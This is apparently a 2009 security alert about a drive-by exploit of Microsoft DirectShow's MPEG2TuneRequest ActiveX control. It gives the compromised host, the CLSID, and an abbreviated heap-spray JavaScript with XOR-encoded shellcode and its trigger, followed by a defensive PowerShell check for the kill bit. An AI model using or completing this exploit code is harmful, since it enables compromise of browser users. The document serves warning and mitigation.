>> 2009.7.4 BDATuner.MPEG2TuneRequest Stack Overflow Exploit (High)
Discovered: 2009-7-4
Predicted rise in exploitation likelihood: High ▁▂▃▄▅▆▇
Compromised site hosting the drive-by: 8oy4t.8866.org
Drive-by page: hxxp://8oy4t.8866.org/aa/go.jpg
Vulnerability: BDATuner.MPEG2TuneRequest Stack Overflow Exploit
CLSID: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
Software: Microsoft DirectShow (msvidctl.dll)
Version: Possibly all available versions
article by safelab.spaces.live.com
Shellcode as follows (abbreviated):
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+'%u5858%u5858%u10EB%u4B5B.....%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%uD5DB%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA'); // xor:0BD
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000) shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++) /* loop body lost in the page's HTML extraction */;
myobject=document.createElement('object');
myobject.width='1';
myobject.height='1';
myobject.data='./logo.gif';
myobject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
Microsoft also published a related Security Advisory on July 6:
http://www.microsoft.com/technet/security/advisory/972890.mspx
An out-of-band patch will probably be released soon, but until then users need to be careful
and must not visit suspicious web sites.
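Microsoft's advisory workaround for this control is the ActiveX kill bit, which stops Internet Explorer from instantiating the CLSID at all. The PowerShell below is an added example, not code from the original post or from Microsoft: it reports whether the kill bit is set for the CLSID listed above and sets it when `$Remediate` is `$true`. The registry path and the 0x400 flag are Microsoft's documented kill-bit mechanism; the function names are this example's own.

```powershell
# Added example: check / set the ActiveX kill bit for the msvidctl CLSID from the post.
# Run from an elevated PowerShell prompt (HKLM is writable only as administrator).
$clsid     = '{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}'
$keyPath   = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
$KILLBIT   = 0x400      # COMPAT_EVIL_DONT_LOAD: IE refuses to load the control
$Remediate = $false     # set to $true to write the kill bit

function Get-CompatFlags {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.'Compatibility Flags'
}

function Test-KillBit {
    param([string]$Path)
    $flags = Get-CompatFlags -Path $Path
    if ($null -eq $flags) { return $false }
    return (($flags -band $KILLBIT) -ne 0)
}

function Set-KillBit {
    param([string]$Path)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $current = Get-CompatFlags -Path $Path
    if ($null -eq $current) { $current = 0 }
    # Preserve any flags already present; only add the kill bit.
    New-ItemProperty -Path $Path -Name 'Compatibility Flags' -PropertyType DWord `
        -Value ($current -bor $KILLBIT) -Force | Out-Null
}

if (Test-KillBit -Path $keyPath) {
    Write-Output "Kill bit already set for $clsid"
} elseif ($Remediate) {
    Set-KillBit -Path $keyPath
    Write-Output "Kill bit written for $clsid; verified: $(Test-KillBit -Path $keyPath)"
} else {
    Write-Output "Kill bit NOT set for $clsid; IE can still instantiate this control"
}
```

The advisory's own Fix it covers additional CLSIDs exposed by msvidctl.dll, so treat this as a check for the one control named in the post, not as a complete workaround.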
For safe use of IE, please refer to the site below.